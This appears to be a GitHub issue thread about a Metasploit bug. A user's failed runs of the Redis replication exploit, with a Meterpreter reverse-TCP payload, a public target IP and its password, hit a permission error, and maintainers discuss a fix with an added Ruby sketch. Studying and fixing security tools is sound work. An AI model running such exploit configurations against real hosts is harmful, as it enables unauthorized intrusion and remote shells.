redis_replication_cmd_exec: write to data/exploits/redis/module.c fails due to insufficient permissions
[*] Started reverse TCP handler on 192.168.190.128:4444
[-] 202.91.247.216:6379 - Exploit failed: Msf::Auxiliary::Scanner::AttemptFailed bad-config: Make sure SRVHOST not be 0.0.0.0, or the slave failed to find master.
[*] Exploit completed, but no session was created.
msf6 exploit(linux/redis/redis_replication_cmd_exec) > set SRVHOST 185.59.221.44
SRVHOST => 185.59.221.44
msf6 exploit(linux/redis/redis_replication_cmd_exec) > run

[*] Started reverse TCP handler on 192.168.190.128:4444
[-] 202.91.247.216:6379 - Exploit failed: Errno::EACCES Permission denied @ rb_sysopen - /usr/share/metasploit-framework/data/exploits/redis/module.c
[*] Exploit completed, but no session was created.
msf6 exploit(linux/redis/redis_replication_cmd_exec) > debug
Please provide the below information in any Github issues you open. New issues can be opened here https://github.com/rapid7/metasploit-framework/issues/new/choose
ENSURE YOU HAVE REMOVED ANY SENSITIVE INFORMATION BEFORE SUBMITTING!
===8<=== CUT AND PASTE EVERYTHING BELOW THIS LINE ===8<===
Module/Datastore
The following global/module datastore, and database setup was configured before the issue occurred:
[framework/core]
LHOST=eth0
[framework/ui/console]
ActiveModule=exploit/linux/redis/redis_replication_cmd_exec
[linux/redis/redis_replication_cmd_exec]
PAYLOAD=linux/x64/meterpreter/reverse_tcp
SRVPORT=6379
WORKSPACE=
VERBOSE=false
WfsDelay=0
EnableContextEncoding=false
ContextInformationFile=
DisablePayloadHandler=false
EXE::EICAR=false
EXE::Custom=
EXE::Path=
EXE::Template=
EXE::Inject=false
EXE::OldMethod=false
EXE::FallBack=false
MSI::EICAR=false
MSI::Custom=
MSI::Path=
MSI::Template=
MSI::UAC=false
SRVHOST=185.59.221.44
ListenerComm=
SSL=false
SSLCompression=false
SSLCipher=
TCP::max_send_size=0
TCP::send_delay=0
RHOSTS=202.91.247.216
RPORT=6379
SSLVersion=Auto
SSLVerifyMode=PEER
Proxies=
CPORT=
CHOST=
ConnectTimeout=10
ShowProgress=true
ShowProgressPercent=10
HTTP::no_cache=false
HTTP::chunked=false
HTTP::header_folding=false
HTTP::junk_headers=false
HTTP::compression=none
HTTP::server_name=Apache
URIHOST=
URIPORT=
SendRobots=false
CMDSTAGER::FLAVOR=auto
CMDSTAGER::DECODER=
CMDSTAGER::TEMP=
CMDSTAGER::SSL=false
FileDropperDelay=
PASSWORD=foobared
READ_TIMEOUT=2
CUSTOM=true
RedisModuleInit=
RedisModuleTrigger=
RedisModuleName=
LHOST=
LPORT=4444
ReverseListenerBindPort=
ReverseAllowProxy=false
ReverseListenerComm=
ReverseListenerBindAddress=
ReverseListenerThreaded=false
StagerRetryCount=10
StagerRetryWait=5
AutoLoadStdapi=true
AutoVerifySession=true
AutoVerifySessionTimeout=30
InitialAutoRunScript=
AutoRunScript=
AutoSystemInfo=true
EnableUnicodeEncoding=false
HandlerSSLCert=
SessionRetryTotal=3600
SessionRetryWait=10
SessionExpirationTimeout=604800
SessionCommunicationTimeout=300
PayloadProcessCommandLine=
AutoUnhookProcess=false
PingbackRetries=0
PingbackSleep=30
PayloadUUIDSeed=
PayloadUUIDRaw=
PayloadUUIDName=
PayloadUUIDTracking=false
EnableStageEncoding=false
StageEncoder=
StageEncoderSaveRegisters=
StageEncodingFallback=true
PrependFork=false
PrependSetresuid=false
PrependSetreuid=false
PrependSetuid=false
PrependSetresgid=false
PrependSetregid=false
PrependSetgid=false
PrependChrootBreak=false
AppendExit=false
MeterpreterDebugLevel=0
RemoteMeterpreterDebugFile=
History
The following commands were ran during the session and before this issue occurred:
0 search redis
1 use exploit/linux/redis/redis_replication_cmd_exec
2 options
3 set RHOSTS xx
4 run
5 set RHOSTS xx
6 run
7 setg LHOST eth0
8 run
9 set SRVHOST 185.59.221.44
10 run
11 debug
Framework Errors
The following framework errors occurred before the issue occurred:
[03/10/2021 03:07:37] [e(0)] core: Failed to connect to the database: No database YAML file
[03/10/2021 03:07:40] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[03/10/2021 03:07:40] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[03/10/2021 03:07:40] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[03/10/2021 03:07:40] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[03/10/2021 03:14:42] [e(0)] core: Exploit failed (linux/redis/redis_replication_cmd_exec) - Msf::OptionValidateError One or more options failed to validate: RHOSTS.
[03/10/2021 03:15:13] [e(0)] core: Exploit failed (linux/redis/redis_replication_cmd_exec) - Msf::OptionValidateError One or more options failed to validate: LHOST.
[03/10/2021 03:16:17] [e(0)] core: Exploit failed (linux/redis/redis_replication_cmd_exec): Msf::Auxiliary::Scanner::AttemptFailed bad-config: Make sure SRVHOST not be 0.0.0.0, or the slave failed to find master. - Msf::Auxiliary::Scanner::AttemptFailed bad-config: Make sure SRVHOST not be 0.0.0.0, or the slave failed to find master.
[03/10/2021 03:17:42] [e(0)] core: Exploit failed (linux/redis/redis_replication_cmd_exec): Errno::EACCES Permission denied @ rb_sysopen - /usr/share/metasploit-framework/data/exploits/redis/module.c - Errno::EACCES Permission denied @ rb_sysopen - /usr/share/metasploit-framework/data/exploits/redis/module.c
Web Service Errors
The following web service errors occurred before the issue occurred:
msf-ws.log does not exist.
Framework Logs
The following framework logs were recorded before the issue occurred:
[03/10/2021 03:07:37] [e(0)] core: Failed to connect to the database: No database YAML file
[03/10/2021 03:07:37] [d(0)] core: Created user based module store
[03/10/2021 03:07:40] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[03/10/2021 03:07:40] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[03/10/2021 03:07:40] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[03/10/2021 03:07:40] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[03/10/2021 03:14:42] [e(0)] core: Exploit failed (linux/redis/redis_replication_cmd_exec) - Msf::OptionValidateError One or more options failed to validate: RHOSTS.
[03/10/2021 03:15:13] [e(0)] core: Exploit failed (linux/redis/redis_replication_cmd_exec) - Msf::OptionValidateError One or more options failed to validate: LHOST.
[03/10/2021 03:16:17] [e(0)] core: Exploit failed (linux/redis/redis_replication_cmd_exec): Msf::Auxiliary::Scanner::AttemptFailed bad-config: Make sure SRVHOST not be 0.0.0.0, or the slave failed to find master. - Msf::Auxiliary::Scanner::AttemptFailed bad-config: Make sure SRVHOST not be 0.0.0.0, or the slave failed to find master.
[03/10/2021 03:17:42] [e(0)] core: Exploit failed (linux/redis/redis_replication_cmd_exec): Errno::EACCES Permission denied @ rb_sysopen - /usr/share/metasploit-framework/data/exploits/redis/module.c - Errno::EACCES Permission denied @ rb_sysopen - /usr/share/metasploit-framework/data/exploits/redis/module.c
Web Service Logs
The following web service logs were recorded before the issue occurred:
msf-ws.log does not exist.
Version/Install
The versions and install method of your Metasploit setup:
Framework: 6.0.31-dev
Ruby: ruby 2.7.2p137 (2020-10-01 revision 5445e04352) [x86_64-linux-gnu]
Install Root: /usr/share/metasploit-framework
Session Type: postgresql selected, no connection
Install Method: Other - Please specify
msf6 exploit(linux/redis/redis_replication_cmd_exec) > set SRVHOST 127.0.0.1
SRVHOST => 127.0.0.1
msf6 exploit(linux/redis/redis_replication_cmd_exec) > run

[*] Started reverse TCP handler on 192.168.190.128:4444
[-] 202.91.247.216:6379 - Exploit failed: Errno::EACCES Permission denied @ rb_sysopen - /usr/share/metasploit-framework/data/exploits/redis/module.c
[*] Exploit completed, but no session was created.

┌──(root💀kali)-[/home/kali]
└─# chmod 777 /usr/share/metasploit-framework/data/exploits/redis/module.c
chmod: cannot access '/usr/share/metasploit-framework/data/exploits/redis/module.c': No such file or directory
Bug exists here:
https://github.com/rapid7/metasploit-framework/blob/17ef194c52ff4e5adb8349d67879e910a063a062/modules/exploits/linux/redis/redis_replication_cmd_exec.rb#L231-L237
The module attempts to write to the Metasploit ./data/ directory.
@bcoles I would like to work on this issue
All yours. I don't think anyone else is working on it.
I suggest performing all changes to the template erb file in memory rather than writing files out to the data directory. I haven't looked at the module code, so I'm not sure if there's any reason why this data has to be written to disk. Writing to data is generally frowned upon (if not forbidden outright). If files need to be stored somewhere they're usually stored somewhere under ~/.msf4/ in the user's home directory.
@hack3r-0m any luck with this?
@bcoles @hack3r-0m
I have taken a look at this.
The data is written to disk so that the resulting file can then be used by a Makefile. This behaviour is triggered when the user wishes to use a custom payload.
I am thinking that the lowest risk approach may be to do the following:
- Copy the contents found here to a new directory within Msf::Config.local_directory.
- Build the exploit using the existing Makefile.
- Remove any files that were copied in step (1) (or perhaps optionally leave these behind for debugging purposes).
Is there any of the above that does not sound like a good idea?
PS I notice that there does not appear to be test coverage for this exploit, so I may see if there is some way to introduce some tests before starting.
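The staging approach proposed in the comment above, sketched as an added example (it is not part of the thread and not Metasploit's own code): the read-only template tree is copied into a private per-user directory, the source file is rendered there, and the directory is removed afterwards. The helper names, the `module.c.erb` template name and the `local_root` parameter (standing in for `Msf::Config.local_directory`) are assumptions, and the sample tree is constructed.

```ruby
require 'erb'
require 'fileutils'
require 'tmpdir'

# Copy the read-only template directory into a private directory under a
# user-writable root, yield it for the build, then remove it.
# local_root stands in for Msf::Config.local_directory (assumption).
def with_build_workspace(template_dir, local_root, keep: false)
  FileUtils.mkdir_p(local_root)
  workdir = Dir.mktmpdir('redis-build-', local_root) # created with mode 0700
  FileUtils.cp_r(File.join(template_dir, '.'), workdir)
  FileUtils.chmod_R('u+rwX', workdir) # copies inherit read-only modes
  yield workdir
ensure
  FileUtils.remove_entry(workdir) if workdir && !keep && File.exist?(workdir)
end

# Render the ERB template inside the workspace, never in the install tree.
# 'module.c.erb' is a hypothetical template name.
def render_module_source(workdir, vars)
  template = File.read(File.join(workdir, 'module.c.erb'))
  out = File.join(workdir, 'module.c')
  File.write(out, ERB.new(template).result_with_hash(vars), perm: 0o600)
  out
end

# Constructed sample: a read-only "install" tree and a per-user root.
def demo
  Dir.mktmpdir do |root|
    install = File.join(root, 'install/data/exploits/redis')
    FileUtils.mkdir_p(install)
    File.write(File.join(install, 'module.c.erb'),
               "static const char *name = \"<%= name %>\";\n")
    File.write(File.join(install, 'Makefile'), "all:\n\t@true\n")
    FileUtils.chmod_R('a-w', install)
    seen = nil
    rendered = with_build_workspace(install, File.join(root, 'local')) do |dir|
      seen = dir
      File.read(render_module_source(dir, name: 'demo')) # make would run here
    end
    result = { rendered: rendered,
               install_untouched: !File.exist?(File.join(install, 'module.c')),
               cleaned_up: !File.exist?(seen) }
    FileUtils.chmod_R('u+w', install) # let mktmpdir remove the sample tree
    result
  end
end
```

Passing `keep: true` leaves the workspace behind for debugging, matching the optional behaviour mentioned in the last step.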
For those of you coming here looking for a quick fix:
sudo chown -R kali:kali /usr/share/metasploit-framework/data/exploits/redis/